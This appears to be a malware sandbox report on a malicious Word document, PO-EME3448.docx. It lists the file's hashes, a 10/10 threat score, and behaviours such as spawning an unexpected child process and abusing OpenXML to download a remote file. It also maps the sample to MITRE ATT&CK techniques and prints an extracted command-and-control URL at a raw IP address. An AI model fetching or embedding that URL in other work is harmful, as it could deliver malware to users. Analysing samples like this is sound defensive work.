Overview

overview

10

Static

static

10

PO-EME3448.docx

windows7_x64

7

PO-EME3448.docx

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    PO-EME3448.docx

  • Size

    10KB

  • Sample

    210601-ssfzwsakjs

  • MD5

    41cb54585c5188446052b8af876825db

  • SHA1

    3f4747f38265aa7ebae7440e78e73e10742bc727

  • SHA256

    474b17e5fdf5312c53ea7c31b6b5a7aebe51b6a6031f166c600527ec54e194ae

  • SHA512

    410b07896f4d1ef045ec2cf4c3e26f34b5e7bb91f6d6552788d9993c3ba88fcbec4d954ef6637695e9f16dbe0eca2242f4e30f98405a3a18f27f04283a359af6

Score
10/10
websettings

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

http://79.110.52.186/naki/n.wbk

Targets

    • Target

      PO-EME3448.docx

    • Size

      10KB

    • MD5

      41cb54585c5188446052b8af876825db

    • SHA1

      3f4747f38265aa7ebae7440e78e73e10742bc727

    • SHA256

      474b17e5fdf5312c53ea7c31b6b5a7aebe51b6a6031f166c600527ec54e194ae

    • SHA512

      410b07896f4d1ef045ec2cf4c3e26f34b5e7bb91f6d6552788d9993c3ba88fcbec4d954ef6637695e9f16dbe0eca2242f4e30f98405a3a18f27f04283a359af6

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Abuses OpenXML format to download file from external location

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks